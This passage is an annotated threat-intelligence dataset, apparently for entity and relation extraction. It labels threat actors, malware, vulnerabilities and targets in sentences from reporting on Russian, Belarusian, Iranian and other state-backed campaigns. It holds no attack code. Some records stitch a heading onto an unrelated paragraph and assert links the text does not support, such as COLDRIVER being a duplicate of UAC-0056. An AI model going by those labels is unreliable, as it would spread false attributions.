same.","entities":[{"id":50344,"label":"location","start_offset":153,"end_offset":160},{"id":50342,"label":"location","start_offset":62,"end_offset":69},{"id":50343,"label":"threat-actor","start_offset":121,"end_offset":132},{"id":50346,"label":"threat-actor","start_offset":5,"end_offset":36}],"relations":[{"id":943,"from_id":50346,"to_id":50342,"type":"targets"}],"Comments":[]} {"id":4549,"text":"Similarly, Russian observed disinformation efforts are also focused on the war in Ukraine and TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm as detailed in the TAG Bulletin.","entities":[{"id":50351,"label":"threat-actor","start_offset":179,"end_offset":203},{"id":50349,"label":"location","start_offset":82,"end_offset":89},{"id":50350,"label":"identity","start_offset":94,"end_offset":97},{"id":50352,"label":"threat-actor","start_offset":210,"end_offset":233},{"id":50353,"label":"identity","start_offset":253,"end_offset":256}],"relations":[{"id":944,"from_id":50351,"to_id":50349,"type":"targets"},{"id":945,"from_id":50352,"to_id":50349,"type":"targets"}],"Comments":[]} {"id":4551,"text":"Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.","entities":[{"id":50355,"label":"identity","start_offset":48,"end_offset":51},{"id":50356,"label":"threat-actor","start_offset":88,"end_offset":93},{"id":50357,"label":"identity","start_offset":135,"end_offset":165},{"id":50358,"label":"location","start_offset":126,"end_offset":132},{"id":50359,"label":"SOFTWARE","start_offset":183,"end_offset":190},{"id":50360,"label":"identity","start_offset":221,"end_offset":244}],"relations":[{"id":946,"from_id":50356,"to_id":50357,"type":"attributed-to"},{"id":947,"from_id":50357,"to_id":50358,"type":"located-at"},{"id":948,"from_id":50357,"to_id":50360,"type":"impersonates"}],"Comments":[]} {"id":4552,"text":"This is the first known instance of Turla distributing Android-related malware.","entities":[{"id":50361,"label":"threat-actor","start_offset":36,"end_offset":41},{"id":50362,"label":"SOFTWARE","start_offset":55,"end_offset":62}],"relations":[{"id":949,"from_id":50361,"to_id":50362,"type":"targets"}],"Comments":[]} {"id":4558,"text":"During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.","entities":[{"id":50370,"label":"TIME","start_offset":116,"end_offset":126},{"id":50368,"label":"malware","start_offset":34,"end_offset":54},{"id":50369,"label":"SOFTWARE","start_offset":78,"end_offset":85},{"id":50371,"label":"attack-pattern","start_offset":156,"end_offset":159},{"id":50372,"label":"location","start_offset":176,"end_offset":183}],"relations":[{"id":950,"from_id":50368,"to_id":50369,"type":"targets"}],"Comments":[]} {"id":4562,"text":"Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.","entities":[{"id":50379,"label":"malware","start_offset":43,"end_offset":54},{"id":50380,"label":"threat-actor","start_offset":130,"end_offset":142},{"id":50381,"label":"malware","start_offset":160,"end_offset":177}],"relations":[{"id":951,"from_id":50381,"to_id":50380,"type":"authored-by"}],"Comments":[]} {"id":4564,"text":"Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).","entities":[{"id":50386,"label":"vulnerability","start_offset":13,"end_offset":54},{"id":50387,"label":"SOFTWARE","start_offset":62,"end_offset":110}],"relations":[{"id":952,"from_id":50387,"to_id":50386,"type":"has"}],"Comments":[]} {"id":4565,"text":"Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.","entities":[{"id":50390,"label":"identity","start_offset":35,"end_offset":38},{"id":50389,"label":"identity","start_offset":16,"end_offset":23},{"id":50391,"label":"identity","start_offset":57,"end_offset":68},{"id":50392,"label":"threat-actor","start_offset":78,"end_offset":83},{"id":50394,"label":"vulnerability","start_offset":132,"end_offset":153},{"id":50393,"label":"threat-actor","start_offset":88,"end_offset":96}],"relations":[{"id":956,"from_id":50393,"to_id":50391,"type":"attributed-to"},{"id":953,"from_id":50393,"to_id":50394,"type":"exploits"},{"id":954,"from_id":50392,"to_id":50394,"type":"exploits"},{"id":955,"from_id":50392,"to_id":50391,"type":"attributed-to"}],"Comments":[]} {"id":4566,"text":"The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.","entities":[{"id":50395,"label":"campaign","start_offset":4,"end_offset":21},{"id":50396,"label":"attack-pattern","start_offset":27,"end_offset":58},{"id":50397,"label":"SOFTWARE","start_offset":76,"end_offset":92},{"id":50398,"label":"location","start_offset":177,"end_offset":184}],"relations":[{"id":957,"from_id":50395,"to_id":50396,"type":"uses"},{"id":958,"from_id":50395,"to_id":50397,"type":"targets"}],"Comments":[]} {"id":4568,"text":"One recent campaign from a group tracked by CERT-UA as UAC-0098 delivered malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine.","entities":[{"id":50401,"label":"identity","start_offset":44,"end_offset":51},{"id":50402,"label":"threat-actor","start_offset":55,"end_offset":63},{"id":50403,"label":"vulnerability","start_offset":103,"end_offset":118},{"id":50404,"label":"identity","start_offset":169,"end_offset":197}],"relations":[{"id":959,"from_id":50402,"to_id":50404,"type":"impersonates"},{"id":960,"from_id":50402,"to_id":50403,"type":"uses"}],"Comments":[]} {"id":4569,"text":"We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.","entities":[{"id":50405,"label":"threat-actor","start_offset":97,"end_offset":102},{"id":50406,"label":"malware","start_offset":137,"end_offset":158}],"relations":[{"id":961,"from_id":50405,"to_id":50406,"type":"uses"}],"Comments":[]} {"id":4570,"text":"Ghostwriter\/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.","entities":[{"id":50408,"label":"threat-actor","start_offset":12,"end_offset":19},{"id":50407,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":50409,"label":"location","start_offset":50,"end_offset":57},{"id":50410,"label":"location","start_offset":138,"end_offset":144}],"relations":[{"id":962,"from_id":50408,"to_id":50407,"type":"duplicate-of"},{"id":963,"from_id":50407,"to_id":50409,"type":"attributed-to"},{"id":964,"from_id":50408,"to_id":50409,"type":"attributed-to"},{"id":965,"from_id":50408,"to_id":50410,"type":"targets"},{"id":966,"from_id":50407,"to_id":50410,"type":"targets"}],"Comments":[]} {"id":4573,"text":"COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[{"id":50416,"label":"threat-actor","start_offset":65,"end_offset":73},{"id":50415,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":50417,"label":"attack-pattern","start_offset":88,"end_offset":119}],"relations":[{"id":967,"from_id":50416,"to_id":50415,"type":"duplicate-of"},{"id":968,"from_id":50415,"to_id":50417,"type":"uses"}],"Comments":[]} {"id":4577,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor’s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.","entities":[{"id":50428,"label":"tools","start_offset":257,"end_offset":270},{"id":50424,"label":"identity","start_offset":71,"end_offset":78},{"id":50425,"label":"threat-actor","start_offset":82,"end_offset":90},{"id":50427,"label":"SOFTWARE","start_offset":204,"end_offset":219},{"id":50423,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":50426,"label":"identity","start_offset":136,"end_offset":175}],"relations":[{"id":969,"from_id":50423,"to_id":50425,"type":"duplicate-of"},{"id":970,"from_id":50423,"to_id":50426,"type":"impersonates"}],"Comments":[]} {"id":4585,"text":"In March 2021, Microsoft kicked off the patch cycle early after releasing an advisory regarding the mass exploitation of four zero-days vulnerabilities by a Chinese Hacking group, HAFNIUM, on the on-premises versions of the Microsoft Exchange Server.","entities":[{"id":50436,"label":"TIME","start_offset":3,"end_offset":13},{"id":50437,"label":"identity","start_offset":15,"end_offset":24},{"id":50438,"label":"vulnerability","start_offset":126,"end_offset":151},{"id":50439,"label":"threat-actor","start_offset":180,"end_offset":187},{"id":50440,"label":"location","start_offset":157,"end_offset":164},{"id":50441,"label":"SOFTWARE","start_offset":196,"end_offset":249}],"relations":[{"id":971,"from_id":50439,"to_id":50440,"type":"located-at"},{"id":972,"from_id":50439,"to_id":50438,"type":"exploits"},{"id":973,"from_id":50441,"to_id":50438,"type":"has"}],"Comments":[]} {"id":4587,"text":" The vulnerability has been dubbed as ProxyLogon by the researchers at DEVCORE, who are credited with finding the bugs in the proxy architecture and the logon mechanism of Exchange.","entities":[{"id":50446,"label":"SOFTWARE","start_offset":172,"end_offset":180},{"id":50444,"label":"vulnerability","start_offset":38,"end_offset":48},{"id":50445,"label":"identity","start_offset":71,"end_offset":78}],"relations":[{"id":974,"from_id":50446,"to_id":50444,"type":"has"}],"Comments":[]} {"id":4591,"text":"According to Shodan, on March 4, there were more than 266,000 Exchange Servers vulnerable to the ProxyLogon vulnerability, a day after the patch was released.","entities":[{"id":50465,"label":"TIME","start_offset":24,"end_offset":31},{"id":50464,"label":"identity","start_offset":13,"end_offset":19},{"id":50466,"label":"SOFTWARE","start_offset":62,"end_offset":78},{"id":50467,"label":"vulnerability","start_offset":97,"end_offset":121}],"relations":[{"id":976,"from_id":50466,"to_id":50467,"type":"has"}],"Comments":[]} {"id":4596,"text":" CVE-2021-26855: Microsoft Exchange Server Remote Code Execution Vulnerability (pre-authenticated Server-Side Request Forgery [SSRF]) CVE-2021-27065: Microsoft Exchange Server Remote Code Execution Vulnerability (post-authenticated Arbitrary File Write) Fig - MS Exchange Client Access Protocol Architecture The Client Access services (Outlook Web App portal) proxies the incoming connections to the Backend services.","entities":[{"id":50475,"label":"vulnerability","start_offset":3,"end_offset":17},{"id":50478,"label":"vulnerability","start_offset":152,"end_offset":213},{"id":50476,"label":"vulnerability","start_offset":19,"end_offset":80},{"id":50477,"label":"vulnerability","start_offset":136,"end_offset":150}],"relations":[{"id":977,"from_id":50476,"to_id":50475,"type":"duplicate-of"},{"id":978,"from_id":50478,"to_id":50477,"type":"duplicate-of"}],"Comments":[]} {"id":4603,"text":"Workload Security uses advanced security controls such as intrusion prevention system (IPS), deep packet inspection (DPI), and integrity monitoring to protect Exchange Servers from attackers that could exploit ProxyLogon.","entities":[{"id":50494,"label":"SOFTWARE","start_offset":159,"end_offset":175},{"id":50493,"label":"vulnerability","start_offset":210,"end_offset":220}],"relations":[{"id":979,"from_id":50494,"to_id":50493,"type":"has"}],"Comments":[]} {"id":4626,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users.","entities":[{"id":50537,"label":"identity","start_offset":55,"end_offset":61},{"id":50538,"label":"threat-actor","start_offset":132,"end_offset":137},{"id":50539,"label":"threat-actor","start_offset":142,"end_offset":157},{"id":50540,"label":"location","start_offset":162,"end_offset":169},{"id":50536,"label":"identity","start_offset":11,"end_offset":14}],"relations":[{"id":980,"from_id":50538,"to_id":50540,"type":"located-at"},{"id":981,"from_id":50539,"to_id":50540,"type":"located-at"}],"Comments":[]} {"id":4629,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":50543,"label":"identity","start_offset":18,"end_offset":21},{"id":50544,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":50545,"label":"malware","start_offset":69,"end_offset":80},{"id":50546,"label":"SOFTWARE","start_offset":111,"end_offset":116},{"id":50542,"label":"TIME","start_offset":3,"end_offset":16},{"id":50547,"label":"SOFTWARE","start_offset":118,"end_offset":124},{"id":50548,"label":"SOFTWARE","start_offset":130,"end_offset":147}],"relations":[{"id":982,"from_id":50545,"to_id":50544,"type":"authored-by"}],"Comments":[]} {"id":4728,"text":"Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users.","entities":[{"id":50632,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":50633,"label":"SOFTWARE","start_offset":88,"end_offset":95},{"id":50634,"label":"SOFTWARE","start_offset":126,"end_offset":133},{"id":50635,"label":"vulnerability","start_offset":37,"end_offset":66}],"relations":[{"id":983,"from_id":50632,"to_id":50635,"type":"has"},{"id":984,"from_id":50633,"to_id":50635,"type":"has"},{"id":985,"from_id":50634,"to_id":50635,"type":"has"}],"Comments":[]} {"id":4800,"text":"Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the same.","entities":[{"id":50702,"label":"location","start_offset":62,"end_offset":69},{"id":50703,"label":"threat-actor","start_offset":121,"end_offset":132},{"id":50704,"label":"location","start_offset":153,"end_offset":160},{"id":50701,"label":"threat-actor","start_offset":5,"end_offset":36}],"relations":[{"id":986,"from_id":50701,"to_id":50702,"type":"targets"}],"Comments":[]} {"id":4802,"text":"Similarly, Russian observed disinformation efforts are also focused on the war in Ukraine and TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm as detailed in the TAG Bulletin.","entities":[{"id":50710,"label":"threat-actor","start_offset":179,"end_offset":203},{"id":50707,"label":"identity","start_offset":94,"end_offset":97},{"id":50709,"label":"attack-pattern","start_offset":28,"end_offset":42},{"id":50711,"label":"threat-actor","start_offset":210,"end_offset":233},{"id":50706,"label":"location","start_offset":82,"end_offset":89},{"id":50708,"label":"location","start_offset":11,"end_offset":18},{"id":50712,"label":"identity","start_offset":253,"end_offset":256}],"relations":[{"id":987,"from_id":50710,"to_id":50709,"type":"uses"},{"id":988,"from_id":50711,"to_id":50709,"type":"uses"},{"id":989,"from_id":50710,"to_id":50708,"type":"located-at"},{"id":990,"from_id":50711,"to_id":50708,"type":"located-at"},{"id":991,"from_id":50710,"to_id":50706,"type":"targets"},{"id":992,"from_id":50711,"to_id":50706,"type":"targets"}],"Comments":[]} {"id":4804,"text":"Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.","entities":[{"id":50714,"label":"identity","start_offset":48,"end_offset":51},{"id":50715,"label":"threat-actor","start_offset":88,"end_offset":93},{"id":50719,"label":"SOFTWARE","start_offset":183,"end_offset":190},{"id":50716,"label":"location","start_offset":126,"end_offset":132},{"id":50717,"label":"identity","start_offset":135,"end_offset":165},{"id":50718,"label":"identity","start_offset":221,"end_offset":244}],"relations":[{"id":994,"from_id":50717,"to_id":50716,"type":"located-at"},{"id":995,"from_id":50715,"to_id":50717,"type":"attributed-to"},{"id":996,"from_id":50715,"to_id":50718,"type":"impersonates"},{"id":997,"from_id":50715,"to_id":50719,"type":"uses"}],"Comments":[]} {"id":4811,"text":"During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.","entities":[{"id":50729,"label":"SOFTWARE","start_offset":78,"end_offset":89},{"id":50730,"label":"TIME","start_offset":116,"end_offset":126},{"id":50731,"label":"attack-pattern","start_offset":156,"end_offset":159},{"id":50727,"label":"threat-actor","start_offset":34,"end_offset":39},{"id":50728,"label":"malware","start_offset":40,"end_offset":49}],"relations":[{"id":998,"from_id":50727,"to_id":50728,"type":"uses"}],"Comments":[]} {"id":4812,"text":"In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website stopwar.pro.","entities":[{"id":50733,"label":"malware","start_offset":39,"end_offset":50},{"id":50732,"label":"SOFTWARE","start_offset":18,"end_offset":29},{"id":50734,"label":"malware","start_offset":52,"end_offset":68},{"id":50735,"label":"DOMAIN","start_offset":107,"end_offset":118}],"relations":[{"id":999,"from_id":50735,"to_id":50734,"type":"hosts"},{"id":1000,"from_id":50735,"to_id":50733,"type":"hosts"}],"Comments":[]} {"id":4815,"text":"Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.","entities":[{"id":50738,"label":"SOFTWARE","start_offset":43,"end_offset":54},{"id":50740,"label":"malware","start_offset":155,"end_offset":177},{"id":50739,"label":"threat-actor","start_offset":130,"end_offset":135}],"relations":[{"id":1001,"from_id":50740,"to_id":50738,"type":"impersonates"},{"id":1003,"from_id":50740,"to_id":50739,"type":"authored-by"}],"Comments":[]} {"id":4817,"text":"Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).","entities":[{"id":50748,"label":"SOFTWARE","start_offset":62,"end_offset":110},{"id":50746,"label":"vulnerability","start_offset":13,"end_offset":54},{"id":50747,"label":"vulnerability","start_offset":0,"end_offset":7}],"relations":[{"id":1004,"from_id":50746,"to_id":50747,"type":"duplicate-of"},{"id":1005,"from_id":50748,"to_id":50747,"type":"has"}],"Comments":[]} {"id":4818,"text":"Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.","entities":[{"id":50750,"label":"identity","start_offset":35,"end_offset":38},{"id":50751,"label":"identity","start_offset":57,"end_offset":75},{"id":50752,"label":"threat-actor","start_offset":78,"end_offset":83},{"id":50753,"label":"threat-actor","start_offset":88,"end_offset":96},{"id":50749,"label":"identity","start_offset":16,"end_offset":23},{"id":50754,"label":"vulnerability","start_offset":132,"end_offset":153}],"relations":[{"id":1006,"from_id":50753,"to_id":50754,"type":"exploits"},{"id":1007,"from_id":50752,"to_id":50754,"type":"exploits"}],"Comments":[]} {"id":4821,"text":"One recent campaign from a group tracked by CERT-UA as UAC-0098 delivered malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine.","entities":[{"id":50760,"label":"identity","start_offset":44,"end_offset":51},{"id":50761,"label":"threat-actor","start_offset":55,"end_offset":63},{"id":50762,"label":"vulnerability","start_offset":103,"end_offset":118},{"id":50763,"label":"identity","start_offset":169,"end_offset":197}],"relations":[{"id":1008,"from_id":50761,"to_id":50763,"type":"impersonates"},{"id":1009,"from_id":50761,"to_id":50762,"type":"uses"}],"Comments":[]} {"id":4822,"text":"We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.","entities":[{"id":50765,"label":"malware","start_offset":137,"end_offset":158},{"id":50764,"label":"threat-actor","start_offset":97,"end_offset":102}],"relations":[{"id":1010,"from_id":50764,"to_id":50765,"type":"uses"}],"Comments":[]} {"id":4823,"text":"Ghostwriter\/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.","entities":[{"id":50766,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":50767,"label":"threat-actor","start_offset":12,"end_offset":19},{"id":50768,"label":"location","start_offset":50,"end_offset":57}],"relations":[{"id":1011,"from_id":50767,"to_id":50766,"type":"duplicate-of"},{"id":1012,"from_id":50766,"to_id":50768,"type":"attributed-to"}],"Comments":[]} {"id":4826,"text":"COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[{"id":50774,"label":"location","start_offset":13,"end_offset":20},{"id":50775,"label":"threat-actor","start_offset":65,"end_offset":73},{"id":50773,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":50776,"label":"attack-pattern","start_offset":93,"end_offset":119}],"relations":[{"id":1013,"from_id":50773,"to_id":50774,"type":"located-at"},{"id":1014,"from_id":50775,"to_id":50773,"type":"duplicate-of"}],"Comments":[]} {"id":4830,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor’s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.","entities":[{"id":50783,"label":"identity","start_offset":71,"end_offset":78},{"id":50785,"label":"SOFTWARE","start_offset":204,"end_offset":219},{"id":50786,"label":"tools","start_offset":257,"end_offset":270},{"id":50784,"label":"identity","start_offset":136,"end_offset":175},{"id":14710,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":14713,"label":"threat-actor","start_offset":82,"end_offset":90}],"relations":[{"id":1015,"from_id":14713,"to_id":14710,"type":"duplicate-of"},{"id":1016,"from_id":14710,"to_id":50784,"type":"targets"},{"id":1017,"from_id":14710,"to_id":50785,"type":"uses"},{"id":1018,"from_id":14710,"to_id":50786,"type":"uses"}],"Comments":[]} {"id":4845,"text":"We have also observed Indian hack-for-hire firms work with freelance actors not directly employed by the firms themselves.","entities":[{"id":50804,"label":"location","start_offset":22,"end_offset":28},{"id":50805,"label":"identity","start_offset":29,"end_offset":48}],"relations":[{"id":1019,"from_id":50805,"to_id":50804,"type":"located-at"}],"Comments":[]} {"id":4847,"text":"A recent campaign from an Indian hack-for-hire operator was observed targeting an IT company in Cyprus, an education institution in Nigeria, a fintech company in the Balkans and a shopping company in Israel.","entities":[{"id":50812,"label":"location","start_offset":200,"end_offset":206},{"id":50809,"label":"location","start_offset":96,"end_offset":102},{"id":50807,"label":"location","start_offset":26,"end_offset":32},{"id":50808,"label":"identity","start_offset":33,"end_offset":55},{"id":50810,"label":"location","start_offset":132,"end_offset":139},{"id":50811,"label":"location","start_offset":166,"end_offset":173}],"relations":[{"id":1020,"from_id":50808,"to_id":50807,"type":"located-at"},{"id":1021,"from_id":50808,"to_id":50809,"type":"targets"},{"id":1023,"from_id":50808,"to_id":50811,"type":"targets"},{"id":1024,"from_id":50808,"to_id":50812,"type":"targets"},{"id":1022,"from_id":50808,"to_id":50810,"type":"targets"}],"Comments":[]} {"id":4850,"text":"One cluster of this activity frequently targets government, healthcare, and telecom sectors in Saudi Arabia, the United Arab Emirates, and Bahrain with credential phishing campaigns.","entities":[{"id":50820,"label":"location","start_offset":95,"end_offset":107},{"id":50821,"label":"location","start_offset":113,"end_offset":133},{"id":50822,"label":"location","start_offset":139,"end_offset":146},{"id":50823,"label":"campaign","start_offset":152,"end_offset":181}],"relations":[{"id":1025,"from_id":50823,"to_id":50822,"type":"targets"},{"id":1026,"from_id":50823,"to_id":50820,"type":"targets"},{"id":1027,"from_id":50823,"to_id":50821,"type":"targets"}],"Comments":[]} {"id":4872,"text":"This group also has links to the original developers of H-Worm, also known as njRAT.","entities":[{"id":50874,"label":"malware","start_offset":56,"end_offset":62},{"id":14895,"label":"malware","start_offset":78,"end_offset":83}],"relations":[{"id":1028,"from_id":14895,"to_id":50874,"type":"duplicate-of"}],"Comments":[]} {"id":4873,"text":"In 2014, Microsoft filed a civil suit against the developer, Mohammed Benabdellah, for the development and dissemination of H-Worm.","entities":[{"id":50875,"label":"TIME","start_offset":3,"end_offset":7},{"id":50877,"label":"identity","start_offset":61,"end_offset":81},{"id":50878,"label":"malware","start_offset":124,"end_offset":130},{"id":50876,"label":"identity","start_offset":9,"end_offset":18}],"relations":[{"id":1029,"from_id":50878,"to_id":50877,"type":"authored-by"}],"Comments":[]} {"id":4874,"text":"Benabdellah, who also goes by the moniker Houdini, has been actively involved in the day-to-day development and operational deployment of the credential phishing capabilities used by this group since its inception.","entities":[{"id":50881,"label":"attack-pattern","start_offset":142,"end_offset":161},{"id":50879,"label":"identity","start_offset":0,"end_offset":11},{"id":50880,"label":"identity","start_offset":42,"end_offset":49}],"relations":[{"id":1030,"from_id":50880,"to_id":50879,"type":"duplicate-of"}],"Comments":[]} {"id":4908,"text":"Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google’s naming), and Kantal (Google’s naming) which shares code similarity with Vidar.","entities":[{"id":50930,"label":"malware","start_offset":106,"end_offset":119},{"id":50931,"label":"malware","start_offset":121,"end_offset":134},{"id":50925,"label":"malware","start_offset":53,"end_offset":71},{"id":50926,"label":"malware","start_offset":73,"end_offset":86},{"id":50927,"label":"malware","start_offset":88,"end_offset":95},{"id":50928,"label":"malware","start_offset":97,"end_offset":104},{"id":50932,"label":"malware","start_offset":136,"end_offset":141},{"id":50933,"label":"malware","start_offset":165,"end_offset":171},{"id":50934,"label":"malware","start_offset":224,"end_offset":229},{"id":50923,"label":"malware","start_offset":37,"end_offset":44},{"id":50924,"label":"malware","start_offset":46,"end_offset":51}],"relations":[{"id":1032,"from_id":50933,"to_id":50934,"type":"variant-of"}],"Comments":[]} {"id":4930,"text":"In this blog, we explore some of the most notable campaigns we’ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.","entities":[{"id":50945,"label":"threat-actor","start_offset":131,"end_offset":136},{"id":50947,"label":"location","start_offset":141,"end_offset":148}],"relations":[{"id":1033,"from_id":50945,"to_id":50947,"type":"located-at"}],"Comments":[]} {"id":4979,"text":"We assess that these campaigns delivered ALIEN, a simple Android malware in charge of loading PREDATOR, an Android implant described by CitizenLab in December 2021.","entities":[{"id":51036,"label":"TIME","start_offset":150,"end_offset":163},{"id":51034,"label":"malware","start_offset":94,"end_offset":102},{"id":51035,"label":"identity","start_offset":136,"end_offset":146},{"id":15307,"label":"malware","start_offset":41,"end_offset":46}],"relations":[{"id":1034,"from_id":15307,"to_id":51034,"type":"drops"}],"Comments":[]} {"id":5017,"text":"Here is a deeper look at the campaign activity TAG has observed and the actions the team has taken to protect our users over the past few weeks: APT28 or Fancy Bear, a threat actor attributed to Russia GRU, was observed targeting users in Ukraine with a new variant of malware.","entities":[{"id":51078,"label":"location","start_offset":239,"end_offset":246},{"id":51074,"label":"identity","start_offset":47,"end_offset":50},{"id":51075,"label":"threat-actor","start_offset":145,"end_offset":150},{"id":51076,"label":"threat-actor","start_offset":154,"end_offset":164},{"id":51077,"label":"identity","start_offset":195,"end_offset":205}],"relations":[{"id":1035,"from_id":51076,"to_id":51075,"type":"duplicate-of"},{"id":1036,"from_id":51075,"to_id":51077,"type":"attributed-to"},{"id":1037,"from_id":51075,"to_id":51078,"type":"targets"}],"Comments":[]} {"id":5022,"text":"Turla, a group TAG attributes to Russia FSB, continues to run campaigns against the Baltics, targeting defense and cybersecurity organizations in the region.","entities":[{"id":51087,"label":"identity","start_offset":15,"end_offset":18},{"id":51086,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":51088,"label":"identity","start_offset":33,"end_offset":43},{"id":51089,"label":"location","start_offset":84,"end_offset":91}],"relations":[{"id":1038,"from_id":51086,"to_id":51088,"type":"attributed-to"},{"id":1039,"from_id":51086,"to_id":51089,"type":"targets"}],"Comments":[]} {"id":5025,"text":"Recently observed Turla domains: COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to use Gmail accounts to send credential phishing emails to a variety of Google and non-Google accounts.","entities":[{"id":51091,"label":"threat-actor","start_offset":33,"end_offset":42},{"id":51092,"label":"threat-actor","start_offset":98,"end_offset":106},{"id":51093,"label":"SOFTWARE","start_offset":125,"end_offset":130},{"id":51094,"label":"identity","start_offset":191,"end_offset":197},{"id":51090,"label":"threat-actor","start_offset":18,"end_offset":23}],"relations":[{"id":1040,"from_id":51092,"to_id":51091,"type":"duplicate-of"},{"id":1041,"from_id":51091,"to_id":51093,"type":"uses"},{"id":1042,"from_id":51091,"to_id":51094,"type":"targets"}],"Comments":[]} {"id":5030,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, has remained active during the course of the war and recently resumed targeting of Gmail accounts via credential phishing.","entities":[{"id":51098,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":51100,"label":"location","start_offset":72,"end_offset":82},{"id":51101,"label":"SOFTWARE","start_offset":180,"end_offset":185},{"id":51102,"label":"attack-pattern","start_offset":199,"end_offset":218},{"id":51099,"label":"threat-actor","start_offset":57,"end_offset":68}],"relations":[{"id":1043,"from_id":51099,"to_id":51100,"type":"located-at"},{"id":1044,"from_id":51099,"to_id":51101,"type":"uses"},{"id":1045,"from_id":51099,"to_id":51102,"type":"uses"}],"Comments":[]} {"id":5037,"text":"Recently observed Ghostwriter credential phishing domains and emails: Curious Gorge, a group TAG attributes to China's PLA SSF, has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia.","entities":[{"id":51116,"label":"location","start_offset":232,"end_offset":238},{"id":51117,"label":"location","start_offset":243,"end_offset":255},{"id":51113,"label":"identity","start_offset":93,"end_offset":96},{"id":51115,"label":"location","start_offset":223,"end_offset":230},{"id":51112,"label":"threat-actor","start_offset":70,"end_offset":83},{"id":51111,"label":"threat-actor","start_offset":18,"end_offset":29},{"id":51114,"label":"identity","start_offset":111,"end_offset":126}],"relations":[{"id":1046,"from_id":51112,"to_id":51114,"type":"attributed-to"},{"id":1047,"from_id":51112,"to_id":51115,"type":"targets"},{"id":1048,"from_id":51112,"to_id":51116,"type":"targets"},{"id":1049,"from_id":51112,"to_id":51117,"type":"targets"}],"Comments":[]} {"id":5054,"text":"Here is a deeper look at the campaign activity TAG has observed over the past two weeks: Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and 